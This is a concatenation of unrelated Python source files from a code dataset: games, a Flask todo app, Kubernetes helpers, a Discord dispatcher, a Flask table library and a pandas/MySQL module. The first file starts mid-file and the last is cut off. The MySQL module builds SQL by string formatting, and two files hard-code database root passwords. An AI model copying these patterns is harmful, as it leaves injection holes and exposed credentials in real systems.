'django_celery_beat.schedulers.DatabaseScheduler'\nCELERY_BEAT_SCHEDULE = {\n 'interval': {\n 'task': 'builder.tasks.add',\n # 'schedule': crontab(minute=0, hour=0),\n 'schedule': timedelta(seconds=2),\n 'args': (1, 2)\n }\n}\n","sub_path":"djsearch/local_settings.py","file_name":"local_settings.py","file_ext":"py","file_size_in_byte":2063,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"367968760","text":"import numpy as np\nimport random\nfrom Barco import *\nfrom Tablero import *\nimport Constantes as cs\n\nclass Jugador:\n\n def __init__(self):\n\n self.tablero_barcos = Tablero(10)\n self.tablero_barcos.coloca_barcos_random()\n self.tablero_disparos = Tablero(10)\n self.vidas = 20\n self.disparos = []\n\n\n # def barcos(self):\n #\n # array_barcos_1_pos = np.array([Barco((1, 'C'), 1), Barco((3, 'H'), 1), Barco((6, 'I'), 1), Barco((8, 'C'), 1)])\n #\n # array_barcos_2_pos = np.array([Barco((1, 'F'), 2, 0), Barco((1, 'I'), 2, 1), Barco((10, 'G'), 2, 1)])\n #\n # array_barcos_3_pos = np.array([Barco((3, 'A'), 3, 0), Barco((5, 'E'), 3, 1)])\n #\n # array_barcos_4_pos = np.array([Barco((8, 'F'), 4, 1)])\n #\n # return np.concatenate((array_barcos_1_pos, array_barcos_2_pos, array_barcos_3_pos, array_barcos_4_pos))\n\n def imprimir_tablero(self):\n titulo = np.array(cs.LISTA_CARACTERES)\n print(\" \",titulo, \" \",titulo)\n print(\"\")\n for i in range(len(cs.LISTA_NUMEROS)):\n if i != 9:\n numero = str(cs.LISTA_NUMEROS[i]) + \" \"\n else:\n numero = str(cs.LISTA_NUMEROS[i])\n\n print(numero, self.tablero_barcos.matriz[i],\n \" \", numero, self.tablero_disparos.matriz[i])\n\n print(\"\\n\")\n\n '''def posicion_random(self):\n\n x = random.randint(0, 9)\n\n y = random.randint(0, 9)\n\n return (x, y)\n\n def barcos_random(self):\n\n for propiedades in cs.TIPOS_BARCO:\n\n contador = 0\n\n while contador < propiedades[1]:\n\n posicion = self.posicion_random()\n\n x = posicion[0]\n\n y = posicion[1]\n\n slicing_sur = self.tablero_barcos.matriz[x: x + propiedades[0], y]\n\n slicing_norte = self.tablero_barcos.matriz[x: x - propiedades[0]:-1, y]\n\n slicing_este = self.tablero_barcos.matriz[x, y: y + propiedades[0]]\n\n slicing_oeste = self.tablero_barcos.matriz[x, y:y - propiedades[0]:-1]\n\n if cs.BARCO_CHAR not in slicing_sur and len(slicing_sur) == propiedades[0]:\n\n self.tablero_barcos.matriz[x: x + propiedades[0], y] = cs.BARCO_CHAR\n contador += 1\n\n elif cs.BARCO_CHAR not in slicing_norte and len(slicing_norte) == propiedades[0]:\n\n self.tablero_barcos.matriz[x: x - propiedades[0]:-1, y] = cs.BARCO_CHAR\n contador += 1\n\n elif cs.BARCO_CHAR not in slicing_este and len(slicing_este) == propiedades[0]:\n\n self.tablero_barcos.matriz[x, y: y + propiedades[0]] = cs.BARCO_CHAR\n contador += 1\n\n elif cs.BARCO_CHAR not in slicing_oeste and len(slicing_oeste) == propiedades[0]:\n\n self.tablero_barcos.matriz[x, y:y - propiedades[0]:-1] = cs.BARCO_CHAR\n contador += 1'''\n\n def disparar(self, posicion, a_jugador):\n\n self.disparos.append(posicion)\n\n posicion_traducida = self.traducir_posicion(posicion)\n\n\n if a_jugador.tablero_barcos.matriz[posicion_traducida[0], posicion_traducida[1]] == cs.BARCO_CHAR:\n\n self.tablero_disparos.matriz[posicion_traducida[0], posicion_traducida[1]] = cs.TOCADO_CHAR\n\n a_jugador.tablero_barcos.matriz[posicion_traducida[0], posicion_traducida[1]] = cs.TOCADO_CHAR\n\n a_jugador.vidas -= 1\n\n return True\n\n else:\n\n self.tablero_disparos.matriz[posicion_traducida[0], posicion_traducida[1]] = 
cs.FALLO_CHAR\n\n a_jugador.tablero_barcos.matriz[posicion_traducida[0], posicion_traducida[1]] = cs.FALLO_CHAR\n\n return False\n\n def traducir_posicion(self, posicion):\n\n x = posicion[0] - 1\n\n y = cs.LISTA_CARACTERES.index(posicion[1])\n\n return (x, y)\n","sub_path":"Jugador.py","file_name":"Jugador.py","file_ext":"py","file_size_in_byte":3934,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"284354862","text":"#!/usr/bin/env pypy\n# -*- coding: utf-8 -*-\n\nfrom __future__ import print_function\nimport math\nimport sys\n\ndef name_score(name):\n res = 0\n for ltr in name:\n if ltr.isalpha():\n v = ord(ltr.lower()) - ord('a') + 1\n res += v\n return res\n\ndef main():\n names = sys.stdin.readline().strip().split(',')\n names = sorted(names)\n res = 0\n for idx, name in enumerate(names):\n res += (idx + 1) * name_score(name)\n print(res)\n\nif __name__ == '__main__':\n main()\n","sub_path":"pe_22.py","file_name":"pe_22.py","file_ext":"py","file_size_in_byte":512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"255687479","text":"# -*- coding:utf8 -*-\nimport pandas as pd\nimport pymysql\n\nfrom .utils import make_tezheng_code, make_format\n\n\n# 根据解析出的结果构造特征字符串和物料编码\nclass MakeMetaCode(object):\n def __init__(self, db, conn, name, spec, unit, guid):\n self.db, self.conn, self.name, self.spec, self.unit, self.guid = db, conn, name, spec, unit, guid\n\n def pre_options(self):\n curs = self.db.cursor(cursor=pymysql.cursors.DictCursor)\n res = make_format(self.name, self.spec, self.unit, curs)\n curs.close()\n if not res:\n return None, None\n return self.make_specs_and_wuliao_code(res['在库名称'], res['在库特征'], res['单位'])\n\n def mysql_execute(self, sql, cursor=pymysql.cursors.DictCursor):\n cur = self.db.cursor(cursor=cursor)\n try:\n cur.execute(sql)\n self.db.commit()\n result = cur.fetchone()\n except Exception as e:\n print(e)\n return None\n cur.close()\n return result\n\n def make_code_and_df(self, specs_arr, meta):\n if specs_arr:\n df = self.make_spec_df(meta['Guid'], specs_arr)\n df = self.add_specs_not_exist(df.copy(), specs_arr, meta['Guid'])\n if df.index.size == 0:\n return df, meta['MuLu_Code']\n df_check = df['TeZheng_Attr_Name'].drop_duplicates().to_list()\n if len(df_check) < df.index.size:\n return df, meta['MuLu_Code']\n _specs = df['TeZheng_Value'].sort_values().to_list()\n df.drop(['TeZheng_Attr_Name', 'TeZheng_Name', 'TeZheng_Value'], inplace=True, axis=1)\n code = meta['MuLu_Code'] + ''.join(_specs)\n df['WuLiao_Guid'] = meta['Guid']\n else:\n df = pd.DataFrame({'WuLiao_Guid': meta['Guid']}, index=[0])\n code = meta['MuLu_Code']\n return df, code\n\n # 根据特征名称生成特征字符串和物料编码\n def make_specs_and_wuliao_code(self, wuliao, specs_arr, unit):\n sql = \"select Guid,MuLu_Code from mulu_code where Name='%s' limit 1\" % wuliao\n meta = self.mysql_execute(sql)\n if not meta:\n return None, None\n if unit:\n specs_arr.append(('单位', unit))\n return specs_arr, meta\n\n def add_in_tables(self, specs_arr, meta):\n df, code = self.make_code_and_df(specs_arr, meta)\n df['code'] = code\n df['BaoJian_CaiLiaoSheBei_Guid'] = self.guid\n return self.add_in_map(df)\n\n def make_guid_by_index(self, df, table, num_size, guid='Guid', drop_index=True):\n max_guid = self.mysql_execute(\"SELECT MAX(%s) max_id FROM %s\" % (guid, table))\n start_guid = 1\n if max_guid['max_id']:\n start_guid = int(max_guid['max_id']) + 1\n my_format = '%%%s' % ('.%sd' % num_size)\n df = 
df.reset_index(drop=True)\n df['index'] = df.index\n df['Guid'] = df['index'].apply(lambda x: my_format % (x + start_guid))\n if drop_index:\n del df['index']\n return df\n\n # 向map表添加\n def add_in_map(self, df):\n df = self.make_guid_by_index(df.copy(), 'trade_data', 9)\n try:\n df.to_sql('trade_data', con=self.conn, index=False, chunksize=1000, if_exists='append')\n return True\n except:\n return False\n\n # 向特征项表添加\n def add_in_df_atrr(self, dic):\n df = pd.DataFrame(dic, index=[0])\n sql = \"select Guid from tezheng_attribute where WuLiao_Guid='%s' and Tezheng_Name='%s'\" % \\\n (dic['WuLiao_Guid'], dic['Tezheng_Name'])\n statu = self.mysql_execute(sql)\n if statu:\n return statu['Guid']\n df = self.make_guid_by_index(df.copy(), 'tezheng_attribute', 8)\n try:\n df.to_sql('tezheng_attribute', con=self.conn, index=False, chunksize=1000, if_exists='append')\n # 事实上只有1行\n return df['Guid'][0]\n except:\n return False\n\n def add_in_tezheng_value(self, arr, meta):\n df = pd.DataFrame(arr)\n df = df.drop_duplicates(subset=['TeZheng_Guid', 'TeZheng_Name'])\n df = self.make_guid_by_index(df.copy(), 'tezheng_value', 11, drop_index=False)\n max_code = self.mysql_execute(\"SELECT MAX(TeZheng_Value) code FROM tezheng_value WHERE WuLiao_Guid='%s'\" % meta)\n max_code = max_code['code']\n if not max_code:\n max_code = 0\n df['TeZheng_Value'] = make_tezheng_code(df['index'], max_code)\n del df['index']\n try:\n df.to_sql('tezheng_value', con=self.conn, index=False, chunksize=1000, if_exists='append')\n df.rename(columns={'Guid': 'TeZhengValue_Guid'}, inplace=True)\n return df[['TeZhengValue_Guid', 'TeZheng_Guid', 'TeZheng_Attr_Name', 'TeZheng_Name', 'TeZheng_Value']]\n except:\n return pd.DataFrame()\n\n def add_specs_not_exist(self, df, specs, wuliao_guid):\n terminate = []\n for v in specs:\n df_1 = df[df['TeZheng_Attr_Name'] == v[0]]\n if df_1.index.size == 0:\n attr_guid = self.add_in_df_atrr({'WuLiao_Guid': wuliao_guid, 'Tezheng_Name': v[0]})\n if not attr_guid:\n continue\n terminate.append({'WuLiao_Guid': wuliao_guid, 'TeZheng_Guid': attr_guid,\n 'TeZheng_Attr_Name': v[0], 'TeZheng_Name': v[1]})\n continue\n df_2 = df_1[df_1['TeZheng_Name'] == v[1]]\n if df_2.index.size == 0:\n terminate.append({'WuLiao_Guid': wuliao_guid, 'TeZheng_Guid': df_1['TeZheng_Guid'][0],\n 'TeZheng_Attr_Name': v[0], 'TeZheng_Name': v[1]})\n # 添加特征项时发生错误的attr\n if len(terminate) > 0:\n df_3 = self.add_in_tezheng_value(terminate, wuliao_guid)\n if df_3.index.size > 0:\n df = df.append(df_3, sort=False)\n return df\n\n def make_spec_df(self, wuliao_guid, arr):\n spec_values = map(lambda x: x[1], arr)\n names = ','.join(map(lambda x: \"'%s'\" % x, spec_values))\n sql = \"select Guid TeZhengValue_Guid,TeZheng_Guid,TeZheng_Attr_Name,TeZheng_Name,TeZheng_Value from \" \\\n \"tezheng_value where WuLiao_Guid='%s' and TeZheng_Name in (%s)\" % (wuliao_guid, names)\n sql = sql.replace('\\\\', '\\\\\\\\').replace('\\\"', '\\\\\\\"').replace('%', '%%')\n df = pd.read_sql(sql, self.conn)\n if df.index.size == 0:\n return df\n df_ = pd.DataFrame()\n for v in arr:\n df_ = df_.append(df[(df['TeZheng_Attr_Name'] == v[0]) & (df['TeZheng_Name'] == v[1])])\n return df_\n","sub_path":"lib/query_info.py","file_name":"query_info.py","file_ext":"py","file_size_in_byte":6720,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"568572801","text":"\"\"\"\n=============\n配置文件\n=============\n\"\"\"\n\nimport os\n\nDEBUG = True if os.environ.get('FLASK_DEBUG', 'no') == 'yes' else 
False\nSQLALCHEMY_DATABASE_URI = os.environ.get(\n 'SQLALCHEMY_DATABASE_URI',\n 'mysql+pymysql://root:hello_world@127.0.0.1:3306/project_a')\n\nSQLALCHEMY_TRACK_MODIFICATIONS = True if os.environ.get(\n 'SQLALCHEMY_TRACK_MODIFICATIONS', 'yes') == 'yes' else False\n","sub_path":"aivptr/project-a/web/conf.py","file_name":"conf.py","file_ext":"py","file_size_in_byte":394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"653301093","text":"from django.http.response import HttpResponseNotFound, HttpResponseRedirect\nfrom todoApp.models import Todo\nfrom django.shortcuts import render\n\n# Create your views here.\n\ndef homepage(request):\n todos = Todo.objects.all()\n return render(request, 'index.html', {'todos':todos})\n\ndef create(request):\n if request.method == 'POST':\n todo = Todo()\n todo.title = request.POST.get('title')\n todo.description = request.POST.get('description')\n todo.save()\n return HttpResponseRedirect('/')\n\ndef edit(request, id):\n try:\n todo = Todo.objects.get(id = id)\n if request.method == 'POST':\n todo.title = request.POST.get('title')\n todo.description = request.POST.get('description')\n todo.save()\n return HttpResponseRedirect('/')\n else:\n return render(request, 'edit.html', {'todo':todo})\n except Todo.DoesNotExist:\n return HttpResponseNotFound(\"<h2>Задача не найдена</h2>
\")","sub_path":"todo/todoApp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":990,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"429105907","text":"#!/usr/bin/env python\n\nimport logging\n\nlogging.basicConfig(level=logging.INFO, format='%(asctime)s %(message)s', datefmt='%Y-%m-%d %I:%M:%S %p') # optional: filename=\"log.txt\"\n\n\nclass TheManager:\n def __enter__(self):\n print('Before')\n\n def __exit__(self, type, value, traceback):\n print('After')\n\nwith TheManager() as something:\n print('Doing something')\n\n\nlogging.info(\"info\")\nlogging.debug(\"debug\")\nlogging.error(\"error\")\nlogging.warning(\"warning\")\nlogging.critical(\"critical\")\n\n","sub_path":"Python/logging/logging_and_with.py","file_name":"logging_and_with.py","file_ext":"py","file_size_in_byte":507,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"412836420","text":"import sys\n\n\ndef get_minmax_move(board, max_depth=2):\n # Get the result of a minimax run and return the move\n score, move = minmax(board, board.player, max_depth, 0)\n return move\n\n\ndef minmax(board, player, max_depth, current_depth):\n # Check if we're done recursing\n if board.game_is_over() or current_depth == max_depth:\n return board.evaluate(player), (None, None)\n\n best_move = (None, None)\n if board.current_player() == player:\n best_score = -sys.maxint + 1\n else:\n best_score = sys.maxint\n moves_x, moves_y = board.get_moves()\n\n # Go through each move\n for i in range(moves_x.size):\n new_board = board.copy()\n new_board.make_move((moves_x[i], moves_y[i]))\n\n # Recurse\n current_score, current_move = minmax(new_board, player, max_depth, current_depth + 1)\n\n # Update the best score\n if board.current_player() == player:\n if current_score > best_score:\n best_score = current_score\n best_move = (moves_x[i], moves_y[i])\n else:\n if current_score < best_score:\n best_score = current_score\n best_move = (moves_x[i], moves_y[i])\n\n # Return the score and the best move\n return best_score, best_move\n","sub_path":"Project_2/TicTacToe_and_Minmax/agent.py","file_name":"agent.py","file_ext":"py","file_size_in_byte":1288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"314239150","text":"# Given 3 intns, return sum. But if any value is a teen, it doesn't count (unless its 15 or 16). 
\n# Write helper function fix_teen that takes an int and returns the value fixed for the teen rule, to avoid repeating code 3 times \n\n\ndef fix_teen(n):\n if n in [12,13,14,17,18,19]:\n return 0\n return n\n\ndef no_teen_sum(a,b,c):\n return fix_teen(a) + fix_teen(b) + fix_teen(c)\n\n\n\n# print(fix_teen(15)) # 15\n# print(fix_teen(16)) # 16\n# print(fix_teen(13)) # 0\n# print(fix_teen(19)) # 0\n\nprint(no_teen_sum(1,2,3)) # 6 \nprint(no_teen_sum(1,16,1)) # 18 \nprint(no_teen_sum(2,13,1)) # 3 \nprint(no_teen_sum(13,15,13)) # 15 ","sub_path":"CodingBat/logic2/no_teen_sum.py","file_name":"no_teen_sum.py","file_ext":"py","file_size_in_byte":609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"124589371","text":"import datetime\nfrom typing import Any, Dict\n\nimport kubernetes\nfrom dagster import check\nfrom dagster.utils import frozendict\nfrom dateutil.parser import parse\nfrom kubernetes.client import ApiClient\n\n\ndef _k8s_value(data, classname, attr_name):\n if classname in ApiClient.NATIVE_TYPES_MAPPING:\n klass = ApiClient.NATIVE_TYPES_MAPPING[classname]\n else:\n klass = getattr(kubernetes.client.models, classname)\n\n if klass in ApiClient.PRIMITIVE_TYPES:\n return klass(data)\n elif klass == object:\n return data\n elif klass == datetime.date:\n return parse(data).date()\n elif klass == datetime.datetime:\n return parse(data)\n else:\n if not isinstance(data, (frozendict, dict)):\n raise Exception(\n f\"Attribute {attr_name} of type {klass.__name__} must be a dict, received {data} instead\"\n )\n\n return k8s_model_from_dict(klass, data)\n\n\n# Heavily inspired by kubernetes.client.ApiClient.__deserialize_model, with more validation\n# that the keys and values match the expected format. Expects attribute names to be in camelCase.\ndef k8s_model_from_dict(model_class, model_dict: Dict[str, Any]):\n check.dict_param(model_dict, \"model_dict\")\n kwargs = {}\n\n expected_keys = set(model_class.attribute_map.values())\n invalid_keys = set(model_dict).difference(expected_keys)\n\n if len(invalid_keys):\n raise Exception(f\"Unexpected keys in model class {model_class.__name__}: {invalid_keys}\")\n\n for attr, attr_type in model_class.openapi_types.items():\n # e.g. 
config_map => configMap\n mapped_attr = model_class.attribute_map[attr]\n if mapped_attr in model_dict:\n value = model_dict[mapped_attr]\n kwargs[attr] = _k8s_value(value, attr_type, mapped_attr)\n\n return model_class(**kwargs)\n","sub_path":"python_modules/libraries/dagster-k8s/dagster_k8s/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"414882256","text":"import pytest\nimport re\n\n\n@pytest.fixture()\ndef GetCandidateVersion(Command):\n def CandidateVersion(pkg):\n \"\"\" Check the output of \"apt-cache poicy \"\n to determine the candidate version for a package.\n\n Args:\n Command - module to run apt-cache policy\n pkg - name of the package you want to check candidates for\n\n Returns:\n Candidate version for pkg\n \"\"\"\n policy = Command.check_output(\"apt-cache policy {}\".format(pkg))\n candidates = re.search(\"Candidate: (.*)\", policy)\n if candidates:\n return candidates.groups(0)[0]\n else:\n return \"\"\n return CandidateVersion\n\n\ndef test_pip_exists(Package, GetCandidateVersion):\n \"\"\" Ensure the candidate version of pip is installed.\n\n Args:\n Package - Module to determine package install status and version\n GetPolicy - Get version of candidate package\n \"\"\"\n pip = Package(\"python-pip\")\n pip_candidate_version = GetCandidateVersion(\"python-pip\")\n assert pip.is_installed\n assert pip.version == pip_candidate_version\n","sub_path":"ci/ansible/roles/azavea.pip/tests/test_pip.py","file_name":"test_pip.py","file_ext":"py","file_size_in_byte":1126,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"539859364","text":"from notbook import show_plot\nfrom bokeh.plotting import figure\nfrom bokeh.sampledata.iris import flowers\n\n\"\"\"md\n# This is a title\n\nThis should be a **section** of markdown.\n\nHere we have bullets:\n\n* one bullet\n* another bullet\n\"\"\"\n\n# { Testing Section\nquestion = 422\nfoobar = 123\nprint('answer:', question + 2)\n# }\n\n\"\"\"md\nanother section of **markdown**.\n\"\"\"\n\nprint('this should be shown as a standalone code block')\nprint({'foo': 'bar', 2: 3, 4: list(range(5)), (1, 2): range(10)}, [1, 2, 3])\nprint('last part of print')\n\n\"\"\"md\ndifferent\n\"\"\"\nprint(1, 2, '3')\n\n# {\nimport re\nRE_URI_NOT_ALLOWED = re.compile(r'[^a-zA-Z0-9_\\-/.]')\nRE_HTML_SYMBOL = re.compile(r'&(?:#\\d{2,}|[a-z0-9]{2,});')\nRE_TITLE_NOT_ALLOWED = re.compile(r'[^a-z0-9_\\-]')\nRE_REPEAT_DASH = re.compile(r'-{2,}')\n\n\ndef slugify(v, *, path_like=True):\n v = v.replace(' ', '-').lower()\n if path_like:\n v = RE_URI_NOT_ALLOWED.sub('', v)\n else:\n v = RE_HTML_SYMBOL.sub('', v)\n v = RE_TITLE_NOT_ALLOWED.sub('', v)\n return RE_REPEAT_DASH.sub('-', v).strip('_-')\n# } useful bit of code about this\n\n\ncolormap = {'setosa': 'red', 'versicolor': 'green', 'virginica': 'blue'}\ncolors = [colormap[x] for x in flowers['species']]\n\np = figure(title='Iris Morphology')\np.xaxis.axis_label = 'Petal Length'\np.yaxis.axis_label = 'Petal Width'\n\np.circle(flowers['petal_length'], flowers['petal_width'], color=colors, fill_alpha=0.2, size=10)\n\nshow_plot(p)\n","sub_path":"demo-script.py","file_name":"demo-script.py","file_ext":"py","file_size_in_byte":1433,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"465975735","text":"#!/usr/bin/env python3.5\n''' The interface between textual commands and the things that 
process them.\n'''\n\nimport logging\n\n# Commands we want to register should be imported here\nfrom handlers import handlerbase, eightball, custom_message\n\nclass Dispatcher:\n ''' Handles dispatching of commands.\n '''\n client = None\n handler_dict = {}\n\n def register(self, command, handler):\n ''' Associate a command with a handler object that implements the handlers.Handler class,\n so that users can type the command and have the bot respond to it.\n '''\n # Error handling\n if command in self.handler_dict:\n logging.error('Dispatcher: command %s already registered, cannot reregister\\n', command)\n return 1\n if not isinstance(handler, handlerbase.HandlerBase):\n logging.error('Dispatcher: handler object does not implement the HandlerBase class\\n')\n return 1\n # Register command\n self.handler_dict[command] = handler\n\n def deregister(self, command):\n ''' Dissociate a command and handler.\n '''\n # Error handling\n if not command in self.handler_dict:\n logging.error('Dispatcher: command %s is not registered\\n', command)\n return 1\n # Deregister command\n del self.handler_dict[command]\n return 0\n\n async def dispatch(self, message):\n ''' Identifies if a message represents a bot command,\n and if so, dispatches the command to the handler's process() method.\n '''\n # Not sure if empty strings are valid messages, but doesn't hurt to check here\n if not message.content:\n return\n # Check if the message begins with any command;\n for command, handler in self.handler_dict.items():\n if message.content.startswith(command):\n # Because we're not in control of what handlers do, it's possible they can\n # throw almost any exception. We should be defensive here, because we don't\n # want our bot to crash if a command fails, but we do want to see what\n # went wrong, so write the command and exception to stderr.\n try:\n await handler.process(self.client, message)\n except Exception as err:\n logging.error('Handler threw exception %s on message: \\'%s\\'\\n', \\\n (type(err).__name__, message.content))\n logging.error('Exception: %s\\n', err)\n break\n\n def __init__(self, client, config_obj):\n ''' Get a reference to the discord.Client()\n and also register commands\n '''\n self.client = client\n self.register('!8ball', eightball.Eightball())\n # Register custom command-message bindings from config\n if isinstance(config_obj.custom_messages, dict):\n for custom_command, reply_messages in config_obj.custom_messages.items():\n self.register(custom_command, custom_message.CustomMessage(reply_messages))\n","sub_path":"lib/dispatch.py","file_name":"dispatch.py","file_ext":"py","file_size_in_byte":3106,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"477644876","text":"#coding=utf-8\n\nfrom __future__ import absolute_import, unicode_literals\n\nimport copy\n\nfrom jinja2.filters import escape\nfrom flask import Flask, render_template, url_for, request\nfrom flask_sqlalchemy import SQLAlchemy\n\nfrom columns import *\nfrom rows import *\nfrom utils import *\n\n\n## Table\nclass TableData(object):\n def __init__(self, data, table):\n self.queryset = data\n self.table = table\n\n if self.table.order_by_list:\n self.ordering()\n self.page_obj = self.queryset.paginate(page=self.table.page,\n per_page=self.table.per_page)\n self.page_obj.total_items = self.queryset.count()\n self.list = self.page_obj.items\n \n def ordering(self):\n model = self.table._meta.model\n \n for order_by in self.table.order_by_list:\n order = 'asc'\n if 
order_by[0] == '-':\n order = 'desc'\n order_by = order_by[1:]\n a = A(\"%s.%s\" % (order_by, order)) # i.e. \"name.desc\"\n self.queryset = self.queryset.order_by(a.resolve(model))\n\n def __iter__(self):\n return iter(self.list)\n\n def __len__(self):\n return len(self.list)\n\n def __getitem__(self, key):\n data = self.list[key]\n if isinstance(key, slice):\n return type(self)(data, self.table, self.page, self.per_page)\n else:\n return data\n\n\nclass TableMeta(type):\n def __new__(cls, name, bases, attrs):\n\n attrs[\"_meta\"] = opts = TableOptions(attrs.get(\"Meta\", None))\n columns = [(name_, attrs.pop(name_)) for name_, column in attrs.items()\n if isinstance(column, Column)]\n columns.sort(lambda x, y: cmp(x[1].creation_counter, y[1].creation_counter))\n\n parent_columns = []\n for base in bases[::-1]:\n if hasattr(base, \"base_columns\"):\n parent_columns = base.base_columns.items() + parent_columns\n\n attrs[\"base_columns\"] = SortedDict(parent_columns)\n attrs[\"base_columns\"].update(SortedDict(columns))\n\n return super(TableMeta, cls).__new__(cls, name, bases, attrs)\n\n\nclass TableOptions(object):\n\n def __init__(self, options=None):\n super(TableOptions, self).__init__()\n self.order_by_list = getattr(options, 'order_by_list', None)\n self.model = getattr(options, 'model', None)\n if self.order_by_list and self.model is None:\n raise ValueError(\"if you give *order_by* you should give *model* too!\")\n self.per_page = getattr(options, 'per_page', None)\n self.url_makers = getattr(options, 'url_makers', None)\n # print '(TableOptions)self.per_page::', self.per_page\n \n\nclass Table(object):\n __metaclass__ = TableMeta\n TableDataClass = TableData\n\n def __init__(self, data, page=None, per_page=None, order_by=None,\n sequence=None, request=None, template=None,):\n \n # Sequence\n self.sequence = sequence\n if sequence is not None:\n self._sequence = Sequence(sequence)\n self._sequence.expand(self.base_columns.keys())\n else:\n self._sequence = Sequence(('...',))\n self._sequence.expand(self.base_columns.keys())\n self.columns = BoundColumns(self)\n\n if request is None:\n raise ValueError(\"request is required\")\n self.request = request\n\n # Order By\n main_order_by = order_by if order_by else request.args.get('order_by', None)\n self.order_by_list = self._meta.order_by_list\n if self.order_by_list and main_order_by is not None:\n for i in range(len(self.order_by_list)):\n if (self.order_by_list[i] == main_order_by\n or self.order_by_list[i] == main_order_by[1:]\n or main_order_by == self.order_by_list[i][1:]):\n self.order_by_list.pop(i)\n break\n self.order_by_list.insert(0, main_order_by)\n \n self.page = page or request.args.get('page', 1, type=int)\n self.per_page = (per_page or request.args.get('per_page', None, type=int)\n or self._meta.per_page or 20)\n\n self.data = self.TableDataClass(data=data, table=self)\n self.rows = BoundRows(self.data)\n self.template = template\n\n # print 'self._sequence', self._sequence\n\n\n @property\n def sequence(self):\n return self._sequence\n\n @sequence.setter\n def sequence(self, value):\n if value:\n value = Sequence(value)\n value.expand(self.base_columns.keys())\n self._sequence = value\n\n @property\n def page_obj(self):\n return self.data.page_obj\n\n @property\n def page_url(self):\n request = self.request\n req_args = request.args.to_dict()\n uri = request.url_root + request.path[1:]\n def func(page, order_by=None):\n req_args['page'] = page\n old_order_by = req_args.get('order_by', None)\n if order_by:\n if 
old_order_by == order_by:\n order_by = '-' + order_by\n req_args['order_by'] = order_by\n return uri + '?' + '&'.join(['%s=%s'%(k, v)\n for k, v in req_args.items()])\n return func\n\n def as_html():\n pass\n\n\nif __name__ == '__main__':\n app = Flask(__name__)\n app.config['SQLALCHEMY_DATABASE_URI'] = 'mysql://root:yawen00@localhost/test_table'\n app.config['DEBUG'] = True\n db = SQLAlchemy(app)\n\n class User(db.Model):\n __tablename__ = 'users3'\n\n id = db.Column(db.Integer, primary_key=True)\n parent_id = db.Column(db.Integer, db.ForeignKey('users3.id'))\n email = db.Column(db.String(50))\n name = db.Column(db.String(40))\n age = db.Column(db.Integer(40))\n bit = db.Column(db.String(30))\n\n parent = db.relationship(\"User\", remote_side=[id])\n\n def __init__(self, parent_id, email, name, age, bit):\n self.parent_id = parent_id\n self.email = email\n self.name = name\n self.age = age\n self.bit = bit\n\n # db.create_all()\n\n class UserTable(Table):\n check = CheckBoxColumn()\n parent = LinkColumn('user', accessor=\"parent.name\")\n email = EmailColumn(orderable=True)\n name = Column()\n age = Column(orderable=True)\n bit = Column()\n\n class Meta():\n per_page = 3\n order_by_list = ['name', '-age']\n model = User # just for order by\n url_makers = {'parent': lambda record: url_for('user', id=getattr(record, 'id', 1),\n mk='QUERY_STRING')}\n\n\n ## views\n @app.route(\"/user//\")\n def user(id):\n user = User.query.get_or_404(id)\n return ', '.join([user.name, str(user.age), 'Parent:', user.parent.name, user.bit])\n\n @app.route(\"/table\")\n def index():\n # print 'url_for::', url_for('index', a=3, b=2, _external=True)\n page = request.args.get('page', 1, type=int)\n table = UserTable(User.query, page=page, request=request)\n return render_template('test_table.html', table=table)\n \n app.run(host=\"0.0.0.0\", port=5001)\n","sub_path":"tables.py","file_name":"tables.py","file_ext":"py","file_size_in_byte":7381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"100973149","text":"##################\n\"\"\"\n\nauthor: John Hossler\n\nfile: binsearch.py\n\nCS260 PROJECT#6 2/12/2015\n\nBinSearchTree is a binary search tree implemented as a dictionary. 
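# The binsearch.py record below duplicates the returnNode() recursion
# inside find(). A sketch of find() expressed through returnNode()
# instead, assuming the BinSearchTree class as defined in that record:
def find(self, ident):
    # returnNode() yields the matching BSTNode or None, so membership
    # testing reduces to a None check.
    return self.returnNode(ident) is not None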
This class was created for the sole purpose of helping with project6 for CS 260.\n\nOffers insert and returnNode capabilities\n\n\"\"\"\n##################\n\nclass BSTNode:\n \n def __init__(self,ident = None,minHeap = None,maxHeap = None,nex = None,left = None,right = None):\n self.ident = ident\n self.minHeap = minHeap\n self.maxHeap = maxHeap\n self.nex = nex\n self.left = left\n self.right = right\n\nclass BinSearchTree:\n\n def __init__(self,root = None):\n self.root = root\n\n def insert(self,ident,Min,Max):\n if self.root == None:\n self.root = BSTNode(ident,Min,Max)\n return\n\n def recurse(node):\n if ident < node.ident:\n if node.left == None:\n node.left = BSTNode(ident,Min,Max)\n else:\n recurse(node.left)\n else:\n if node.right == None:\n node.right = BSTNode(ident,Min,Max)\n else:\n recurse(node.right)\n \n recurse(self.root)\n\n def returnNode(self,ident):\n def recurse(node):\n if ident < node.ident:\n if node.left == None:\n return\n elif node.left.ident == ident:\n return node.left\n else:\n return recurse(node.left)\n else:\n if node.right == None:\n return\n elif node.right.ident == ident:\n return node.right\n else:\n return recurse(node.right)\n\n if self.root == None:\n return\n elif self.root.ident == ident:\n return self.root\n else:\n return recurse(self.root)\n\n def 